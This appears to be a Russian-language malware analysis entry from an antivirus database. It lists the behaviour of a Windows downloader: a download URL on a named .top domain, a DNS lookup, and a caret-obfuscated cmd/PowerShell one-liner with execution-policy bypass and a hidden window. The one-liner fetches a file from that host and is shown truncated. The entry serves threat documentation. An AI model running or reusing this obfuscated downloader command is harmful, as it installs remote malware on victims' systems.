Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWe^RSHel^L.E^X^e ^-ex^ECuTiONp^oLI^C^Y BY^pass -^NOp^rofIle ^-^wIn^D^O^wsT^ylE ^HiD^deN (^neW^-o^bjEct ^s^Ys^T^e^M.ne^t.^WE^B^cL^iEnT^).dOWn^l^OAdFiLE('http://www.doorasope....
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "poWe^RSHel^L.E^X^e ^-ex^ECuTiONp^oLI^C^Y BY^pass -^NOp^rofIle ^-^wIn^D^O^wsT^ylE ^HiD^deN (^neW^-o^bjEct ^s^Ys^T^e^M.ne^t.^WE^B^cL^iEnT^).dOWn^l^OAdFiLE('http://www.doorasope....' (со скрытым окном)